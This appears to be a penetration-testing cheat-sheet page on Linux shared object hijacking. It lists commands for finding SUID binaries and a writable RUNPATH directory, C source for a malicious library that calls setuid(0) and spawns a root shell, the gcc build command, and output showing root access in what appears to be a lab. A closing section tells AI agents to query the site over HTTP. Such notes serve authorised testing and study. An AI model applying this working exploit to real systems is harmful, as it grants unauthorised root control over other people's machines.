# Shared Object Hijacking

## Identification

```
find / -type f -perm -u=s 2>/dev/null | xargs ls -l
```

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FVPkgSrp5jgoIQf07IBmk%2Fimage.png?alt=media&#x26;token=dc9f8855-2d7d-420c-a8e6-a72d5e3d94b0" alt=""><figcaption></figcaption></figure>

```shell-session
$ ls -la payroll

-rwsr-xr-x 1 root root 16728 Sep  1 22:05 payroll
```

### Print the shared object required by a binary or shared object

```shell-session
$ ldd payroll

linux-vdso.so.1 =>  (0x00007ffcb3133000)
libshared.so => /lib/x86_64-linux-gnu/libshared.so (0x00007f7f62e51000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f7f62876000)
/lib64/ld-linux-x86-64.so.2 (0x00007f7f62c40000)
```

### Runpath

```shell-session
$ readelf -d payroll  | grep PATH

 0x000000000000001d (RUNPATH)            Library runpath: [/development]
```

```shell-session
ls -la /development/

total 8
drwxrwxrwx  2 root root 4096 Sep  1 22:06 ./
drwxr-xr-x 23 root root 4096 Sep  1 21:26 ../
```

```shell-session
cp /lib/x86_64-linux-gnu/libc.so.6 /development/libshared.so
```

```shell-session
$ ldd payroll

linux-vdso.so.1 (0x00007ffd22bbc000)
libshared.so => /development/libshared.so (0x00007f0c13112000)
/lib64/ld-linux-x86-64.so.2 (0x00007f0c1330a000)
```

Running `ldd` against the binary lists the library's path as `/development/libshared.`so, which means that it is vulnerable

```shell-session
$ ./payroll 

./payroll: symbol lookup error: ./payroll: undefined symbol: dbquery
```

&#x20;Compile a shared object which includes the missing function

## Exploitation

```c
#include<stdio.h>
#include<stdlib.h>

void dbquery() {
    printf("Malicious library loaded\n");
    setuid(0);
    system("/bin/sh -p");
} 
```

```shell-session
gcc src.c -fPIC -shared -o /development/libshared.so
```

```shell-session
$ ./payroll 

***************Inlane Freight Employee Database***************

Malicious library loaded
# id
uid=0(root) gid=1000(mrb3n) groups=1000(mrb3n)
```

## Tool

{% embed url="<https://github.com/eblazquez/fakelib.sh>" %}

## Resources

{% embed url="<https://www.boiteaklou.fr/Abusing-Shared-Libraries.html>" %}

{% embed url="<https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/shared-library-hijacking/>" %}

{% embed url="<https://0xdf.gitlab.io/2019/02/02/htb-dab.html#privesc-genevieve--root>" %}

<br>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://0xss0rz.gitbook.io/0xss0rz/pentest/privilege-escalation/linux/shared-object-hijacking.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.